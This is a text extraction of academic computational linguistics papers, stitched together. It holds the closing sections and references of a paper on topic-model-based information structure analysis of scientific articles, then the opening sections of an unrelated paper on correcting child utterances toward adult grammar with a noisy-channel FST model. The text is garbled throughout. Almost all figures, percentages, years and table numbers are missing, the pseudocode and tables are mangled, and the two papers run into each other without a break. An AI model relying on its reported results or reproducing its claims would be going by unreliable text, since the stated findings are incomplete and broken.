differences between topicge and gold, as well as between expertge and gold are not statistically significant. quent category according to the gold standard. this baseline sheds light on the usefulness of section names for our task. as is evident from the table, while this baseline is competitive with the unsuper- vised models in terms of accuracy, its class-based f-score performance is quite poor. not only does it lag behind the unsupervised models in terms of the f-score of the most frequent classes of the introduc- tion and discussion sections, but it does not iden- tify any of the classes except from the most frequent ones in any of the sections - a task the unsupervised models often perform with reasonable quality. 
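For clarity, the greedy many-to-one mapping and the class-based scores used in this evaluation, together with the MFC baseline, can be sketched as follows. This is an illustrative re-implementation, not the evaluation code used in the paper, and it assumes the induced labels and gold labels are given as parallel lists over test sentences.

```python
from collections import Counter, defaultdict

def greedy_many_to_one(induced, gold):
    """Map each induced (unlabeled) category to the gold category it shares most sentences with."""
    overlap = defaultdict(Counter)
    for c, g in zip(induced, gold):
        overlap[c][g] += 1
    return {c: counts.most_common(1)[0][0] for c, counts in overlap.items()}

def class_prf(pred, gold, label):
    """Precision, recall and F-score for one category."""
    tp = sum(p == label and g == label for p, g in zip(pred, gold))
    fp = sum(p == label and g != label for p, g in zip(pred, gold))
    fn = sum(p != label and g == label for p, g in zip(pred, gold))
    prec = tp / (tp + fp) if tp + fp else 0.0
    rec = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * prec * rec / (prec + rec) if prec + rec else 0.0
    return prec, rec, f1

def evaluate(induced, gold):
    mapping = greedy_many_to_one(induced, gold)
    pred = [mapping[c] for c in induced]
    accuracy = sum(p == g for p, g in zip(pred, gold)) / len(gold)
    return accuracy, {lab: class_prf(pred, gold, lab) for lab in sorted(set(gold))}

def mfc_baseline(gold):
    """The MFC baseline: every sentence gets the section's most frequent gold category."""
    return [Counter(gold).most_common(1)[0][0]] * len(gold)
```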
finally, the table also presents the performance of the topicge* model for which constraints are leaned from an external data set - different from the test set. the results show that there is no substantial difference between the performance of the topicge and topicge* models. while topicge achieves better f-scores in five of the cases in the table, top- icge* is better in four cases and the performance is identical in two cases. section level accuracies are better for topicge in two of the four sections, but the difference is only - %. comparison with supervised learning table compares the quality of unsupervised constrained- based learning with that of lightly supervised feature-based learning. since our models, topicgc and topicge, perform quite similarly, we included only topicge in this evaluation. the lightly su- pervised models (maxent classifiers) were trained with a total of sentences - for each section- specific classifier. the table demonstrates that top- icge outperforms maxent with light supervision in terms of class based f-scores in the introduction and discussion sections. in the methods section, where . % of the sentences belong to the most frequent category, and in the results section, the models per- form quite similarly. overall accuracy numbers are quite similar for both models with maxent doing better for the results section and topicge for the discussion section. these results further demon- strate that unsupervised constrained learning pro- vides a practical solution to information structure analysis of scientific articles. extractive summarization evaluation table presents the average rouge scores for zone- based (topicge, topicgc, expertge and gold) and section-based summaries across our test set articles. topic features {do} be {done}{doing}{be done}{have been done} induce {may do}{to do} show have {have done} increase {did} suggest indicate report cause include inhibit find observe involve associate activate demonstrate result use lead play {could do} know {do do} form contribute {can do}{would do} promote reduce {were done} {done} {doing} {did} use be describe contain perform incubate {do} determine analyze follow add isolate purchase wash accord {to do} treat collect remove prepare obtain measure store stain centrifuge transfer detect purify assess supplement carry dissolve plate receive kill {did}{done} be {doing}{were done} [tab fig] {do} show increase observe compare {to do} expose use have find {did do} treat {be done} report follow drink reduce result administer decrease determine measure include evaluate affect detect induce indicate associate provide reveal suggest occur table : topics and key features extracted by the article-level model (including modal, tense and voice marked in curly brackets, reference to tables or figures marked in square brackets, and verbs in the base form) topic features [no cite] {did} (we) {done}{do}{doing} use {were done} (present) {to do} investigate be (mammary) determine provide (our) treat compare examine {did}{done} [cite] {doing}{were done} be expose find [no cite] drink increase report (recent) (previous) admin- ister {do} contain evaluate (early) {do} [cite] be {done} [no cite] {doing} {be done} {have been done} induce {have done} (it) show {may do} have {to do} include increase (their) associate table : topics and key features extracted by the section-specific topic model of the introduction section (including citations marked in square brackets, pronouns and the follow-up adjective modifiers marked in parentheses, 
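The summarization experiments use standard ROUGE scoring. Purely for illustration, ROUGE-n recall of a generated summary against an expert-written reference reduces to a clipped n-gram overlap, as in this minimal sketch (tokenization is assumed to be done beforehand; ROUGE-2 and ROUGE-L add bigram and longest-common-subsequence variants that the sketch omits).

```python
from collections import Counter

def ngrams(tokens, n):
    return Counter(tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1))

def rouge_n_recall(candidate_tokens, reference_tokens, n=1):
    """Fraction of reference n-grams covered by the candidate summary (clipped counts)."""
    ref, cand = ngrams(reference_tokens, n), ngrams(candidate_tokens, n)
    overlap = sum(min(count, cand[g]) for g, count in ref.items())
    total = sum(ref.values())
    return overlap / total if total else 0.0
```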
modal, tense and voice marked in curly brackets, and verbs in their base form) topic features (we) [no cite] (our) higher (mammary) as because (first) significant possible high (early) (positive) most [cite] present (present) (previous) similar different (its) although consistent furthermore greater due most whereas [no cite] not also (it) but however more (their) both therefore only thus significant lower table : topics and key features extracted by the section-specific topic model of the discussion section (including citations marked in square brackets, pronouns and the follow-up adjective modifiers marked in parentheses, and con- junctions, adjectives and adverbs) topicge and topicgc based summaries outperform the other systems, even the one that uses gold stan- dard information structure categorization. a poten- tial explanation for the better performance of our models compared to expertge is that the relative strength of our models is in identifying the major category of each section while expertge is better at identifying low or medium frequency categories. qualitative analysis we next provide a qualita- tive analysis of the topics induced by our topic mod- els — the article-level model as well as the section- level models — and their key features. note that both our models, topicge and topicgc, assume that the induced topics provide a good approxima- tion of the information structure categories and build their constraints (expert knowledge) from these top- ics accordingly. below we examine this assumption. table presents the topics and key features ob- tained from global topic modeling applied to full ar- ticles. the table reveals a strong correlation between present/future tense and topic , and between past tense and topics and (modal, tense and voice features). the table further demonstrates that top- ics and are linked to verbs that describe research findings, such as “show” and “demonstrate” in topic , and “report” and “indicate” in topic , whereas topic seems related to verbs that describe methods and experiments such as “use” and “prepare“. the feature corresponding to tables and figures [tab fig] is only seen in topic . based on these observations, topics , and seem to be related to az categories con, meth and res respectively. tables and present the topics and the key fea- tures obtained from the section-specific topic mod- eling for the introduction and discussion sections. due to space limitations we cannot provide a de- tailed analysis of the information included in these tables, but it is easy to see that they provide evi- dence for the correlation between topics in the sec- tion specific models and az categories. table demonstrates that for the introduction section topic correlates with the author’s work and topics and with previous work. table shows that for the discussion section topics and well correlate with the az con category and topic with the bkg, cn and diff categories. our analysis therefore demon- strates that the induced topics are well aligned with the actual categories of the az classification scheme or with distinctions (e.g. the author’s own work vs. works of others) that are very relevant for this scheme. note that we have not seeded our models with word-lists and the induced topics are therefore purely data-driven. discussion we presented a new framework for automatic in- duction of declarative knowledge and applied it to constraint-based modeling of the information struc- ture analysis of scientific documents. 
our main con- tribution is a topic-model based method for unsuper- vised acquisition of lexical, syntactic and discourse knowledge guided by the notion of topics and their key features. we demonstrated that the induced top- ics and key features can be used with two differ- ent unsupervised learning methods – a constrained unsupervised generalized expectation model and a graph clustering formulation. our results show that this novel framework rivals more supervised alterna- tives. our work therefore contributes to the impor- tant challenge of automatically inducing declarative knowledge that can reduce the dependence of ml algorithms on manually annotated data. the next natural step in this research is generaliz- ing our framework and make it applicable to more applications, domains and machine learning mod- els. we are currently investigating a number of ideas which will hopefully lead to better natural language learning with reduced human supervision. references sam anzaroot, alexandre passos, david belanger, and andrew mccallum. . learning soft linear con- straints with application to citation field extraction. in acl, pages – . kedar bellare, gregory druck, and andrew mccallum. . alternating projections for learning with expec- tation constraints. in proceedings of the th con- ference on uncertainty in artificial intelligence, pages – . catherine blake. . beyond genes, proteins, and abstracts: identifying scientific claims from full-text biomedical articles. journal of biomedical informat- ics, ( ): – . david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of machine learning research, : – . jill burstein, daniel marcu, and kevin knight. . finding the write stuff: automatic identification of discourse structure in student essays. ieee intelligent systems, ( ): – . ming-wei chang, lev ratinov, and dan roth. . guiding semi-supervision with constraint- driven learning. in acl, pages – . danish contractor, yufan guo, and anna korhonen. . using argumentative zones for extractive sum- marization of scientific articles. in coling, pages – . james curran, stephen clark, and johan bos. . linguistically motivated large-scale nlp with c&c and boxer. in proceedings of the acl demo and poster sessions, pages – . inderjit s. dhillon, yuqiang guan, and brian kulis. . weighted graph cuts without eigenvectors: a multilevel approach. ieee transactions on pat- tern analysis and machine intelligence, ( ): – . gregory druck, gideon mann, and andrew mccallum. . learning from labeled features using gener- alized expectation criteria. in proceedings of the st annual international acm sigir conference on research and development in information retrieval, pages – . kuzman ganchev, joão graça, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. journal of machine learning research, : – . sharon goldwater and tom griffiths. . a fully bayesian approach to unsupervised part-of-speech tag- ging. in acl, pages – . thomas l griffiths and mark steyvers. . find- ing scientific topics. proceedings of the national academy of sciences, (suppl ): – . yufan guo, anna korhonen, maria liakata, ilona silins karolinska, lin sun, and ulla stenius. . identify- ing the information structure of scientific abstracts: an investigation of three different schemes. in bionlp, pages – . yufan guo, anna korhonen, and thierry poibeau. a. a weakly-supervised approach to argumenta- tive zoning of scientific documents. in emnlp, pages – . 
yufan guo, anna korhonen, ilona silins, and ulla ste- nius. b. weakly-supervised learning of infor- mation structure of scientific abstracts–is it accurate enough to benefit real-world tasks in biomedicine? bioinformatics, ( ): – . yufan guo, roi reichart, and anna korhonen. a. improved information structure analysis of scientific documents through discourse and lexical constraints. in naacl hlt, pages – . yufan guo, ilona silins, ulla stenius, and anna korho- nen. b. active learning-based information struc- ture analysis of full scientific articles and two applica- tions for biomedical literature review. bioinformatics, ( ): – . kenji hirohata, naoaki okazaki, sophia ananiadou, and mitsuru ishizuka. . identifying sections in sci- entific abstracts using conditional random fields. in ijcnlp, pages – . douwe kiela, yufan guo, ulla stenius, and anna ko- rhonen. . unsupervised discovery of informa- tion structure in biomedical documents. bioinformat- ics, page btu . dan klein and christopher manning. . corpus- based induction of syntactic structure: models of de- pendency and constituency. in acl, pages – . joel lang and mirella lapata. . similarity-driven semantic role induction via graph partitioning. com- putational linguistics, ( ): – . maria liakata, simone teufel, advaith siddharthan, and colin batchelor. . corpora for conceptualization and zoning of scientific papers. in lrec, pages – . maria liakata, shyamasree saha, simon dobnik, colin batchelor, and dietrich rebholz-schuhmann. . automatic recognition of conceptualization zones in scientific articles and two life science applications. bioinformatics, ( ): – . jimmy lin, damianos karakos, dina demner-fushman, and sanjeev khudanpur. . generative content models for structural analysis of medical abstracts. in bionlp, pages – . chin-yew lin. . rouge: a package for auto- matic evaluation of summaries. in text summarization branches out: proceedings of the acl- workshop, pages – . gideon s mann and andrew mccallum. . simple, robust, scalable semi-supervised learning via expecta- tion regularization. in icml, pages – . gideon s. mann and andrew mccallum. . general- ized expectation criteria for semi-supervised learning of conditional random fields. in acl, pages – . katja markert, yufang hou, and michael strube. . collective classification for fine-grained information status. in acl, pages – . andrew kachites mccallum. . mal- let: a machine learning for language toolkit. http://mallet.cs.umass.edu. david mcclosky and christopher d. manning. . learning constraints for consistent timeline extraction. in emnlp-conll, pages – . microsoft. . autosummarize: automatically summarize a document. https://support.office.com/en- us/article/automatically-summarize-a-document- b f ae-ec b- cc-b a- eed d . guido minnen, john carroll, and darren pearce. . applied morphological processing of english. natural language engineering, ( ): – . yoko mizuta, anna korhonen, tony mullen, and nigel collier. . zone analysis in biology articles as a basis for information extraction. international journal of medical informatics on natural language process- ing in biomedicine and its applications, ( ): – . diarmuid ó séaghdha and simone teufel. . unsu- pervised learning of rhetorical structure with un-topic models. in proceedings of coling : technical papers, pages – . roi reichart and regina barzilay. . multi-event ex- traction guided by global constraints. in naacl hlt, pages – . roi reichart and anna korhonen. . 
document and corpus level inference for unsupervised and transduc- tive learning of information structure of scientific doc- uments. in coling, pages – . roi reichart and ari rappoport. . the nvi cluster- ing evaluation measure. in conll, pages – . laura rimell and stephen clark. . porting a lexicalized-grammar parser to the biomedical domain. journal of biomedical informatics, ( ): – . patrick ruch, clia boyer, christine chichester, imad tbahriti, antoine geissbhler, paul fabry, julien gob- eill, violaine pillet, dietrich rebholz-schuhmann, christian lovis, and anne-lise veuthey. . using argumentation to extract key sentences from biomedi- cal abstracts. international journal of medical infor- matics, ( - ): – . alexander rush, roi reichart, michael collins, and amir globerson. . improved parsing and pos tag- ging using inter-sentence consistency constraints. in emnlp-conll, pages – . hagit shatkay, fengxia pan, andrey rzhetsky, and w john wilbur. . multi-dimensional classifica- tion of biomedical text: toward automated, practical provision of high-utility text to diverse users. bioin- formatics, ( ): – . imad tbahriti, christine chichester, frédérique lisacek, and patrick ruch. . using argumentation to retrieve articles with similar citations. international journal of medical informatics, ( ): – . simone teufel and marc moens. . summariz- ing scientific articles: experiments with relevance and rhetorical status. computational linguistics, ( ): – . simone teufel, advaith siddharthan, and colin batche- lor. . towards domain-independent argumenta- tive zoning: evidence from chemistry and computa- tional linguistics. in emnlp, pages – . andrea varga, daniel preotiuc-pietro, and fabio ciravegna. . unsupervised document zone iden- tification using probabilistic graphical models. in lrec, pages – . bonnie webber, markus egg, and valia kordoni. . discourse structure and language technology. natural language engineering, ( ): – . transactions of the association for computational linguistics, ( ) – . action editor: sharon goldwater. submitted / ; revised / ; published / . c© association for computational linguistics. modeling child divergences from adult grammar sam sahakian university of wisconsin-madison sahakian@cs.wisc.edu benjamin snyder university of wisconsin-madison bsnyder@cs.wisc.edu abstract during the course of first language acquisi- tion, children produce linguistic forms that do not conform to adult grammar. in this paper, we introduce a data set and approach for sys- tematically modeling this child-adult grammar divergence. our corpus consists of child sen- tences with corrected adult forms. we bridge the gap between these forms with a discrim- inatively reranked noisy channel model that translates child sentences into equivalent adult utterances. our method outperforms mt and esl baselines, reducing child error by %. our model allows us to chart specific aspects of grammar development in longitudinal stud- ies of children, and investigate the hypothesis that children share a common developmental path in language acquisition. introduction since the publication of the brown study ( ), the existence of standard stages of development has been an underlying assumption in the study of first language learning. as a child moves towards lan- guage mastery, their language use grows predictably to include more complex syntactic structures, even- tually converging to full adult usage. 
in the course of this process, children may produce linguistic forms that do not conform to the grammatical standard. from the adult point of view these are language er- rors, a label which implies a faulty production. con- sidering the work-in-progress nature of a child lan- guage learner, these divergences could also be de- scribed as expressions of the structural differences between child and adult grammar. the predictability of these divergences has been observed by psychol- ogists, linguists and parents (owens, ). our work leverages the differences between child and adult language to make two contributions to- wards the study of language acquisition. first, we provide a corpus of errorful child sentences anno- tated with adult-like rephrasings. this data will al- low researchers to test hypotheses and build models relating the development of child language to adult forms. our second contribution is a probabilistic model trained on our corpus that predicts a gram- matical rephrasing given an errorful child sentence. the generative assumption of our model is that sentences begin in underlying adult forms, and are then stochastically transformed into observed child utterances. given an observed child utterance s, we calculate the probability of the corrected adult trans- lation t as p(t|s) ∝ p(s|t)p(t), where p(t) is an adult language model and p(s|t) is a noise model crafted to capture child grammar errors like omission of certain function words and corruptions of tense or declension. the parame- ters of this noise model are estimated using our cor- pus of child and adult-form utterances, using em to handle unobserved word alignments. we use this generative model to produce n-best lists of candi- date corrections which are then reranked using long range sentence features in a discriminative frame- work (collins and roark, ). for the remainder of this paper we use “error” and “diver- gence” interchangeably. one could argue that our noisy channel model mirrors the cognitive process of child language pro- duction by appealing to the hypothesis that children rapidly learn adult-like grammar but produce errors due to performance factors (bloom, ; ham- burger and crain, ). that being said, our pri- mary goal in this paper is not cognitive plausibility, but rather the creation of a practical tool to aid in the empirical study of language acquisition. by au- tomatically inferring adult-like forms of child sen- tences, our model can highlight and compare devel- opmental trends of children over time using large quantities of data, while minimizing the need for hu- man annotation. besides this, our model’s predictive success it- self has theoretical implications. by aggregating training and testing data across children, our model instantiates the brown hypothesis of a shared de- velopmental path. even when adequate per-child training data exists, using data only from other chil- dren leads to no degradation in performance, sug- gesting that the learned parameters capture general child language phenomena and not just individual habits. besides aggregating across children, our model coarsely lumps together all stages of devel- opment, providing a frozen snapshot of child gram- mar. this establishes a baseline for more cognitively plausible and temporally dynamic models. we compare our correction system against two baselines, a phrase-based machine translation (mt) system, and a model designed for english second language (esl) error correction. 
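Concretely, the noisy-channel decision rule described above amounts to scoring every candidate adult form by the product of a language model term and a noise model term. The snippet below is only a schematic sketch: `language_model` and `noise_model` are placeholder interfaces (in the paper both quantities are computed with weighted finite-state transducers, described later), and the candidate generation step is not shown.

```python
def nbest_corrections(child_sentence, candidate_adult_forms,
                      language_model, noise_model, n=50):
    """Rank candidate adult forms t of a child sentence s by p(t) * p(s | t) in log space.

    `language_model.logprob(t)` and `noise_model.logprob(s, t)` are hypothetical
    interfaces standing in for the FST computations used in the paper.
    """
    scored = []
    for t in candidate_adult_forms:
        score = language_model.logprob(t) + noise_model.logprob(child_sentence, t)
        scored.append((score, t))
    scored.sort(key=lambda pair: pair[0], reverse=True)
    return scored[:n]
```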
relative to the best performing baseline, our approach achieves a % decrease in word error-rate and a four point increase in bleu score. we analyze the perfor- mance of our system on various child error cate- gories, highlighting our model’s strengths (correct- ing be drops and morphological overgeneralizations) as well as its weaknesses (correcting pronoun and auxiliary drops). we also assess the learning rate of our model, showing that very little annotation is needed to achieve high performance. finally, to showcase a potential application, we use our model to chart one aspect of four children’s grammar ac- quisition over time. while generally vindicating the brown thesis of a common developmental path, the results point to subtleties in variation across individ- uals that merit further investigation. background and related work while child error correction is a novel task, com- putational methods are frequently used to study first language acquisition. the computational study of speech is facilitated by talkbank (macwhinney, ), a large database of transcribed dialogues in- cluding childes (macwhinney, ), a subsec- tion composed entirely of child conversation data. computational tools have been developed specif- ically for the large-scale analysis of childes. these tools enable further computational study such as the automatic calculation of the language devel- opment metrics ipsyn (sagae et al., ) and d-level (lu, ), or the automatic formula- tion of novel language development metrics them- selves (sahakian and snyder, ). the availability of child language is also key to the design of computational models of language learning (alishahi, ), which can support the plausibility of proposed human strategies for tasks like semantic role labeling (connor et al., ) or word learning (regier, ). to our knowledge this paper is the first work on error correction in the first language learning domain. previous work has employed a classifier-based approach to iden- tify speech errors indicative of language disorders in children (morley and prud’hommeaux, ). automatic correction of second language (l ) writing is a common objective in computer assisted language learning (call). these tasks generally target high-frequency error categories including ar- ticle, word-form, and preposition choice. previous work in call error correction includes identify- ing word choice errors in toefl essays based on context (chodorow and leacock, ), correcting errors with a generative lattice and pcfg rerank- ing (lee and seneff, ), and identifying a broad range of errors in esl essays by examining linguis- tic features of words in sequence (gamon, ). in a shared esl correction task (dale and kilgar- riff, ), the best performing system (rozovskaya et al., ) corrected preposition, article, punctu- ation and spelling errors by building classifiers for each category. this line of work is grounded in the practical application of automatic error correction as a learning tool for esl students. statistical machine translation (smt) has been applied in diverse contexts including grammar cor- rection as well as paraphrasing (quirk et al., ), question answering (echihabi and marcu, ) and prediction of twitter responses (ritter et al., ). in the realm of error correction, smt has been ap- plied to identify and correct spelling errors in inter- net search queries (sun et al., ). within call, park and levy ( ) took an unsupervised smt approach to esl error correction using weighted fi- nite state transducers (fsts). 
the work described in this paper is inspired by that of park and levy, and in section we detail differences between our approaches. we also include their model as a base- line. data to train and evaluate our translation system, we first collected a corpus of , errorful child-language utterances from the american english portion of the childes database. to encourage diversity in the grammatical divergences captured by our corpus, our data is drawn from a large pool of studies (see bibliography for the full list of citations). in the annotation process, candidate child sen- tences were randomly selected from the pool and classified by hand as either grammatically correct, divergent or unclassifiable (when it was not possi- ble to tell what a child is trying to say). we con- tinued this process until , divergent sentences were found. along the way we also encountered , grammatically correct utterances and that were unclassifiable. because childes includes speech samples from children of diverse age, back- ground and language ability, our corpus does not capture any specific stage of language development. instead, the corpus represents a general snapshot of a learner who has not yet mastered english as their first language. to provide the grammatically correct counterpart to child data, our errorful sentences were corrected by workers on amazon’s mechanical turk web ser- vice. given a child utterance and its surrounding conversational context, annotators were instructed to translate the child utterance into adult-like en- glish. we limited eligible workers to native english these hand-classified sentences are available online along with our set of errorful sentences. error type child utterance insertion i did locked it. inflection more cookie? deletion that not how. lemma choice i got grain. overgeneralization i drawed it. table : examples of error types captured by our model. speakers residing in the us. we also required anno- tators to follow a brief tutorial in which they prac- tice correcting sample utterances according to our guidelines. these guidelines instructed workers to minimally alter sentences to be grammatically con- sistent with a conversation or written letter, without altering underlying meaning. annotators were eval- uated on a worker-by-worker basis and rejected in the rare case that they ignored our guidelines. ac- cepted workers were paid cents for correcting each set of sentences. to achieve a consistent judgment, we posted each set of sentences for correction by different annotators. once multiple reference translations were ob- tained we selected a single best correction by plu- rality, arbitrating ties as necessary. there were sev- eral cases in which corrections obtained by plurality decision did not perfectly follow instructions. these were manually corrected. both the raw translations provided by individual annotators as well as the cu- rated final adult forms are provided online as part of our data set. resulting pairs of errorful child sen- tences and their adult-like corrections were split into % training, % development and % test data, which we use to build, tune and evaluate our gram- mar correction system. in the final test phase, devel- opment data is included in the training set. model according to our generative model, adult-like utter- ances are formed and then transformed by a noisy channel to become child sentences. the structure of our noise model is tailored to match our observa- tions of common child errors. 
these include: func- tion word insertions, function word deletions, swaps of function words and, inflectional changes to con- tent words. examples of each error type are given data is available at http://pages.cs.wisc.edu/~bsnyder in table . our model does not allow reorderings, and can thus be described in terms of word-by-word stochastic transformations to the adult sentence. we use word classes to parameterize our model: pronouns, negators, wh-words, conjunc- tions, prepositions, determiners, modal verbs, “be” verbs, other auxiliary verbs, and lexical content words. the list of words in each class is provided as part of our data set. for each input adult word w, the model generates output word w′ as a hierarchi- cal series of draws from multinomial distributions, conditioned on the original word w and its class c. all distributions receive an asymmetric dirichlet prior which favors retention of the adult word. with the sole exception of word insertions, the distribu- tions are parameterized and learned during train- ing. our model consists of multinomial distri- butions, with , free parameters. the precise form and parameterization of our model were handcrafted for performance on the de- velopment data, using trial and error. we also con- sidered more fine-grained model forms (i.e. one parameter for each non-lexical input-output word pair), as well as coarser parameterizations (i.e. a single shared parameter denoting any inflection change). the model we describe here seemed to achieve the best balance of specificity and general- ization. we now present pseudocode describing the noise model’s operation upon processing each word, along with a brief description of each step. action selection (lines - ): on reading an input word, an action category a is selected from a prob- ability distribution conditioned on the input word’s class. our model allows up to two function word insertions or deletions in a row before a swap is re- quired. lexical content words may not be deleted or inserted, only swapped. insert and delete (lines - ): the deletion case requires no decision after action selection. in the insertion case, the class of the inserted word, c′, is selected conditioned on cprev , the class of the previous adult word. the precise identity of the inserted word is then drawn from a uniform distribution over words in class c′. it is important to note that in the insertion case, the input word at a given iteration will be re-processed at the next iteration (lines - ). insdel ← for word w with class c, inflection f, lemma ` do : if insdel = then a ← swap else : a ∼{insert, delete, swap} | c end if if a = delete then : insdel++ c′ ← � w′ ← � : else if a = insert then insdel++ c′ ∼ classes | cprev , insert : w′ ∼ words in c′ | insert else insdel ← : c′ ← c if c ∈ uninflected-classes then w′ ∼ words in c | w, swap : else if c = aux then `′ ∼ aux-lemmas | `, swap f ′ ∼ inflections | f, swap : w′ ← combine(`′,f ′) else f ′ ∼ inflections | f, swap : w′ ← combine(`,f ′) end if end if : if w′ ∈ irregular then w′ ∼ overgen(w′)∪{w′} end if : if a = insert then goto line end if : end for swap (lines - ): in the swap case, a word of given class is substituted for another word in the same class. depending on the source word’s class, swaps are handled in slightly different ways. if the word is a modal, conjunction, determiner, preposi- tion, “wh-” word or negative, it is considered “unin- flected.” in these cases, a new word w′ is selected from all words in class c, conditioned on the source word w. 
if w is an auxiliary verb, the swap procedure con- sists of two parallel steps. a lemma is selected from possible auxiliary lemmas, conditioned on the lemma of the source word. in the second step, an output inflection type is selected from a distribution conditioned on the source word’s inflection. the precise output word is fully specified by the choice of lemma and conjugation. if w is not in either of the above two categories, it is a lexical word, and our model only allows changes in conjugation or declension. if the source word is a noun it may swap to singular or plural form con- ditioned on the source form. if the word is a verb, it may swap to any conjugated or non-finite form, again conditioned on the source form. lexical words that are not marked by celex (baayen et al., ) as nouns or verbs may only swap to the exact same word. overgeneralization (lines - ): finally, the noisy channel considers the possibility of produc- ing overgeneralized word forms (like “maked” and “childs”) in place of their correct irregular forms. the overgen function produces the incorrect over- generalized form. we draw from a distribution which chooses between this form and the correct original word. our model maintains separate dis- tributions for nouns (overgeneralized plurals) and verbs (overgeneralized past tense). implementation in this section, we describe steps necessary to build, train and test our error correction model. weighted finite state transducers (fsts) used in our model are constructed with openfst (allauzen et al., ). . sentence fsts these fsts provide the basis for our translation pro- cess. we represent sentences by building a simple linear chain fst, progressing from node to node with each arc accepting and yielding one word in the sentence. all arcs are weighted with probability one. auxiliary lemmas include have, do, go, will, and get. . noise fst the noise model provides a conditional probability over child sentences given an adult sentence. we en- code this model as a fst with several states, allow- ing us to track the number of consecutive insertions or deletions. we allow only two of these operations in a row, thereby constraining the length of the out- put sentence. this constraint results in three states (insdel = , insdel = , insdel = ), along with an end state. in our training data, only sentence pairs cannot be described by the noise model due to this constraint. each arc in the fst has an � or adult-language word as input symbol, and a possibly errorful child- language word or � as output symbol. each arc weight is the probability of transducing the input word to the output word, determined according to the parameterized distributions described in sec- tion . arcs corresponding to insertions or dele- tions lead to a new state (insdel++) and are not al- lowed from state insdel = . substitution arcs all lead back to state insdel = . word class infor- mation is given by a set of word lists for each non- lexical class. inflectional information is derived from celex. . language model fst the language model provides a prior distribution over adult form sentences. we build a a trigram language model fst with kneser-ney smoothing using opengrm (roark et al., ). the lan- guage model is trained on all parent speech in the childes studies from which our errorful sentences are drawn. in the language model fst, the input and output words of each arc are identical. 
arcs are weighted with the probability of the n-gram beginning with some prefix associated with the source node and ending with the arc's input/output word. in this setup, the probability of a string is the total weight of the path accepting and emitting that string.

[figure: a simplified decoding fst for the child sentence "that him hat.", with transduction arcs such as that:that, is:<eps>, him:him, his:him, hat:hat and hats:hat. in an actual decoding fst many more transduction arcs exist, including those translating "that" and "him" to any determiner and pronoun, respectively, and affording opportunities for many more deletions and insertions. input and output strings given by fst paths correspond to possible adult-to-child translations.]

training: as detailed in the model section above, our noise model consists of a series of multinomial distributions which govern the transformation from adult word to child word, allowing limited insertions and deletions. (word lists are included for reference with our dataset.) we estimate parameters θ for these distributions that maximize their posterior probability given the observed training sentences {(s,t)}. since our language model p(t) does not depend on the noise model parameters, this objective is equivalent to jointly maximizing the prior and the conditional likelihoods of child sentences given adult sentences:

$$\arg\max_{\theta} \; p(\theta) \prod p(s \mid t, \theta)$$

to represent all possible derivations of each child sentence s from its adult translation t, we compose the sentence fsts with the noise model, obtaining: fsttrain = fstt ◦ fstnoise ◦ fsts. each path through fsttrain corresponds to a single derivation d, with path weight p(s,d|t,θ). by summing all path weights, we obtain p(s|t,θ). we use a map-em algorithm to maximize our objective while summing over all possible derivations. our training scheme relies on fsts weighted in the v-expectation semiring (eisner, ), implemented using code from fstrain (dreyer et al., ). besides carrying probabilities, arc weights are supplemented with a vector to indicate parameter counts involved in the arc traversal. the v-expectation semiring is designed so that the total arc weight of all paths through the fst yields both the probability p(s|t,θ) and the expected parameter counts. our em algorithm proceeds as follows: we start by initializing all parameters to uniform distributions with random noise. we then weight the arcs in fstnoise accordingly. for each sentence pair (s,t), we build fsttrain by composition with our noise model, as described in the previous paragraph. we then compute the total arc weight of all paths through fsttrain by relabeling all input and output symbols to ε and then reducing fsttrain to a single state using epsilon removal (mohri, ). the stopping weight of this single state is the sum of all paths through the original fst, yielding the probability p(s|t,θ), along with expected parameter counts according to our current distributions. we then reestimate θ using the expected counts plus pseudo-counts given by priors, and repeat this process until convergence. besides smoothing our estimated distributions, the pseudo-counts given by our asymmetric dirichlet priors favor multinomials that retain the adult word form (swaps, identical lemmas, and identical inflections); concretely, we use a larger pseudo-count for these favored outcomes and a smaller pseudo-count for all others. in practice, some of the child sentences in our data set cannot be translated into a corresponding adult version using our model.
this is due to a range of rare phenomena like rephrasing, lexical word swaps and word-order errors. in these cases, the composed fst has no valid paths from start to finish and the sentence is removed from training. we run em for iterations, at which time the log likelihood of all sentences generally converges to within . . . decoding after training our noise model, we apply the sys- tem to translate divergent child language to adult- like speech. as in training, the noise fst is com- posed with the fst for each child sentence s. in corresponding to dirichlet hyperparameters of . and . respectively. place of the adult sentence, the language model fst is used, yielding: fstdecode = fstlm ◦fstnoise ◦fsts each path through fstdecode corresponds to an adult translation and derivation (t,d), with path weight p(s,d|t,θ)p(t). thus, the highest-weight path corresponds to the most likely translation and derivation pair: argmax t,d p(t,d|s,θ) we use a dynamic program to find the n highest- weight paths with distinct adult sentences t. this can be viewed as finding the n most likely adult trans- lations, using a viterbi approximation p(t|s,θ) = argmaxd p(t,d|s,θ). in our experiments we set n = . a simplified fstdecode example is shown in figure . . discriminative reranking to more flexibly capture long range syntactic fea- tures, we embed our noisy channel model in a dis- criminative reranking procedure. for each child sen- tence s, we take the n-best candidate translations t , . . . , tn from the underlying generative model, as described in the previous section. we then map each candidate translation ti to a d-dimensional feature vector f(s,ti). the reranking model then uses a d- dimensional weight vector λ to predict the candidate translation with highest linear score: t∗ = argmax ti λ ·f(s,ti) to simulate test conditions, we train the weight vec- tor on n-best lists from -fold cross-validation over training data, using the averaged perceptron rerank- ing algorithm (collins and roark, ). since the n-best list might not include the exact gold-standard correction, a target correction which maximizes our evaluation metric is chosen from the list. the n-best list is non-linearly separable, so perceptron training iterates for rounds, when it is terminated with- out converging. our feature function f(s,ti) yields nine boolean and real-valued features derived from (i) the fst that generates child sentence s from candidate adult- form ti, and (ii) the pos sequence and dependency parse of candidate ti obtained with the stanford parser (de marneffe et al., ). features were se- lected based on their performance in reranking held- out development data from the training set. rerank- ing features are given below: generative model probabilities: we first include the joint probability of the child sentence s and can- didate translation ti, given by the generative model: plm(ti)pnoise(s|ti). we also isolate the candidate translation’s language model and noise model prob- abilities as features. since both of these proba- bilities naturally favor shorter sentences, we scale them to sentence length, yielding n √ plm(ti) and n √ pnoise(s|ti) respectively. by not scaling the joint probability, we allow the reranker to learn its own bias towards longer or shorter corrected sentences. contains noun subject, accusative noun sub- ject: the first boolean feature indicates whether the dependency parse of candidate translation ti con- tains a “nsubj” relation. 
